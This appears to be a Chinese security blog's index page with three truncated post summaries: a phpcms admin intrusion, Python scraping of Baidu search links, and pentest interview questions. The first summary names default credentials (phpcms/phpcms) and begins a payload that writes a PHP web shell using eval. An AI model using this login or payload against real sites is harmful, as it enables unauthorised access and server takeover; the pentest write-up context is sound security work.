摘要： http://xx.xx.com/index.php?m=admin 进入后台登录界面，弱口令phpcms/phpcms成功登录后台 先将如下payload保存至txt文本中 array(1);$b=file_put_contents("phpcms_shell3.php",'<?php eval( 阅读全文

摘要： 记录一下在用python爬取百度链接中遇到的坑： 1.获取百度搜索页面中的域名URL BeautifulSoup获取a标签中href属性后，链接为百度url，利用request直接访问默认会直接进行跳转，无法获取所需域名 此时需要将requests的allow_redirects属性设置为False 阅读全文

摘要： 最近春招准备面试，特开此博客记录从毕业到现在的一些安服渗透测试面试问题，也希望可以帮到一些同样在准备面试的表哥们（按问题频率由高到低排列） WEB渗透： 挖到过你认为最有意思，或危害最大的一个漏洞 说一下你平常测试的渗透思路 要是给你一个只有登录界面的后台管理系统，你有什么思路 SQL注入的分类，以 阅读全文